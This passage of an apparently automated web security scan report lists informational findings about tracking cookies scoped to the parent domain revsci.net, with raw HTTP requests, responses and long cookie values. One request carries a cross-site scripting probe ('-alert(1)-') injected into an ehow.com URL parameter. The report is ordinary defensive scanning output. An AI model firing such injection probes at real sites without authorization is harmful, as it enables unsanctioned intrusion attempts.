Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXakvIXV+cer9duzVms/DJMc; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9iATaSM0VkT/a+o=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:25 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b5&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:25 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:25 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.153. http://pix04.revsci.net/F08747/b3/0/3/1003161/114261376.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/114261376.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl+CTSaM1VkRla8I=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:03 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6497&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:03 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/114261376.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl+CTSaM1VkRla8I=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:03 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6497&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:03 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:02 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.154. http://pix04.revsci.net/F08747/b3/0/3/1003161/114261376.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/114261376.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFekOFbwIUllNab/ceIeEilLVS2kCFjA3BhmBr0r4Qw7fcgurNlqCxKr7OS2Tzwu4/ImKENwACIeUxtxcyhInsW62RvwGttnnTlJdYuG2GMjvmS59xXtW1zcuSNlc6JwL1GC7GLjiagol5wqEfMqEmOXK1+jgPWikvKbfp5MJUU26T53ypH7uwS0nrW8LWKahz0T+cVnt6U+31FQrmtV52AGhTso37wf4V3DagBiioHhz/gif2Y9om2so6WTwDBsQDDb/eZmeqXltfcS1Un7ciBY4U4KA0; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:48 GMT; Path=/
NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:13:48 GMT; Path=/
rtc_0=MLsvsNUvcS5nJgFEV8O6cA+G4idxFuQPjAyWrSbmZ3Tbl2Rd84FlLVUcISRc/FsFPa8heywhNNg5oFbPl3F4dMO1sqcRu9XvUH6T+X2ToNJcKBHEUablLssaqzXvV0sN4iDF0eGzgINZcw0zRL+mPOkQo5u7ZqcIkcvVGKIHC87XbFyPcMgOVI28QjWTCBD7gxqlIHS30QpvQ23aySIZt5ZxD55Z2c2GGfqWfBB6nr8wTvbeVNSkATrp9p3laMToYhkfC7XcQCg1sRH6YdvSsYEoFIsVF5hdhhIgDfYapTcthUYv2wg5i1ihR2cqliV1Zn67wjWxNJuVi6joDXBNdhcMPCFqKzLLKTl4ZuhIeYoc9iXeucply5kFJgfG2imXDzFbc7uGwNb8HtbLXtXcaj5yx988Z002RRxTALk7uCob6xDvhIj76C4h3+AECWUFcJU3nGjKAPJQ; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:48 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/114261376.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.ehow.com%252Fcomputer-software%252F%253F206d4'-alert(1)-'dbefd3749fe%253D1%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fburp%252Fshow%252F3%26DM_EOM%3D1&C=F08747 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=0105974ea67d21e1&F08747&0&4d6e5e16&0&&4d4637e7&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPFeU+FbxIQ1kNYvHseIeEiFPLY3sGlBwefeQGolpUspQOMVXTsemteSudqC0pSV1UN7CZ9KyQiVwn/zK5v5+ZZn71cfM4GDM50Q9Bw8GkAZ6L34ZmFnGKHV8+IM1GCBrxtqctOdKW322q4O2xI0xQVbFabIj862tETQanfX0EDjeVZi1FPBzZhlrQGJeO4blIOojZ1EOdiRWtl2ZtO0tV+rCjUnwLONrvANz8CskgoTzHdE5YQzFjxb1WMuZoF3a1UNiIklxHRD9X1m5TDxPwAUF/RZOro8aE=; udm_0=MLvvNSMNLjpn3gfUDF7BVtAE7s3J6sMsniyxP0ZTGyb0XVS2KCsE++vMKpQLnK3thbdS17nLkt+9I3dBJD4N4xnSKIOw4HD33Ndw3hjVKeJM3aPiaeU8exMDPzNyKFLRF3DdxRZ9sIqeEr0SmFCcxSI9dIKQy0cM793jCrbVqYUB2pih6N3lS/5cGPTHtmlDpDvLEriKHIo8fVN6aflYfmlnjFc3B2TTk+L1ZbkqRfqhMSTXblcL09J671ocAbO5eb5JdW0oPODoRSt8qhdsvA4ZM9epbUpgoE4vYUrR/GKSVeHQDsZNx0tyOCaX3w7BKhZ0lSxxpvwAz1Zc2msetwfxBg0EoXYSdlPd7GEv82FoKEV/c2IzOf/oOsPaVuhmcV2LLJSCO0QDGQ8CLW2o8XoqsbL8bodNogQcgbODuI9fNvprOKBAqYBTvIFC4AnRpEm1RrB4KQ70sYNJlkPYOQo3UsN51S/UkNOZxkIHoJXDsx0L0apRXhGxtEov0nVkA4jJw9bvS1FTGnr9Mui7IgnCpiing6ol+IRaug0X/VOOX/YJvEJvQbyTyMthA2vA4zSS3ZCM+kWtfX8Pho+A+ExcSAGgPFLnVXV4fJc5tKUY1FBoDMIN7VayV9LJeHtWbbZpTVyaCEy0X4fPvBLeRZYdpDnYR+LOw5t35v6d96Er6bNeNlAq8P/93JiIIuXStnIOsckpYuEoD+UzM7QfKx1ktCQ0RKXzJYilYm3Z90VH9ONOnzgp3puwhxCmR740VS47A+ixXoDwsI9d4ae9moH/gYnQL/mz+XxfuytLCNDC8+WjYu2gSpUmwDXYaUXo/8eDrdJ7NC1mIlpHsBkSzDN9j0o5t7EtrJXmQ/T/z84aJs9zsXyujZcXNjZsY8Hy9wJbAsfH8Riof6sRz5fLCwTC8veC4wRBxvE4xpciHSP+yNJJi9yBJ/2dCRgVtTqrufLq9EgENIh+mwHUtfRjFPV5xI5tEvinw9OmttRc7Iyk2hrAo9BxjpbiUuzpbtWouUOCs+dHz8uEo18LLwMEFo0u1k3FOWh4E9ED2pPabo4f2s+0yaSN8JYoGPcnWSfVMVS81rJjwNYjPOk3QfI/3IaU3xJWtSrU24BMPMUfpPLVqj4Q/zfcdNOcqMkaLxUEGO8qDFtoGQ2BbMj5JIvC8L/xP8+oSfTcSyBQVUTy5A0KGn7pKOjc2C4Tb9uDqty1Q0yaEAVd7aKc6b7usBbZn/fWLbkwYtBGn302niPv; rtc_0=MLsvsdUvcS5nJgFEV8O6cA+ssydxFuQPjAyWrSbmZ3Xbl2Rd84FlLVUeISQkZPpq3+/yS+PtxMQT7DslgE+EiBPc1PKM2t+/EOpB4uLrf6GOWya56Dc3gwsoLE781CimXk//GxJynTvaxdqPo1TcXMqyUtwfAzZ2jEbLM1yrYRos7UmLXPcfXiav1mZjU936ZROamqN/fqWS2Q8yar3w1E6Mfwg1R0eyXhh40tZ4iA4m0+aATuP7UocbTVUX5CteZOewKvL7JQQ5iXH7fo8MQylSc1kX/hS/g/6bpKvFkJnlV1iuL3q3JzvhB63Bg7LVssbJt+9XzCTI6mQ2/Y6Is6AG6Ik9cGuVmbjBM+7LXLoebV5kaXjFu+yaDGqJ7tVTKsz3xzzEwV//3BfuqMZMpvXSVZESCesOKM8lj7vQGCuI2IJGrayPJ4SRCJ0=

Response

11.155. http://pix04.revsci.net/F08747/b3/0/3/1003161/118073152.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/118073152.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt30zv0tYD6wb/nfBD4w==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:05 GMT; Path=/
NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:13:05 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/118073152.js?D=DM_LOC%3Dabout%253Ablank%253F_rsiL%253D0%26DM_EOM%3D1&C=F08747 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: pix04.revsci.net
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt30xvkVUA6Ab/nfpD5Q==; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt30zv0tYD6wb/nfBD4w==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:05 GMT; Path=/
Set-Cookie: NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:13:05 GMT; Path=/
X-Proc-ms: 14
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 645
Date: Wed, 02 Feb 2011 15:13:04 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs=[];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z]{3}$)/,'$1');
rsiDom=rsiDom.
...[SNIP]...

11.156. http://pix04.revsci.net/F08747/b3/0/3/1003161/118073152.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/118073152.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

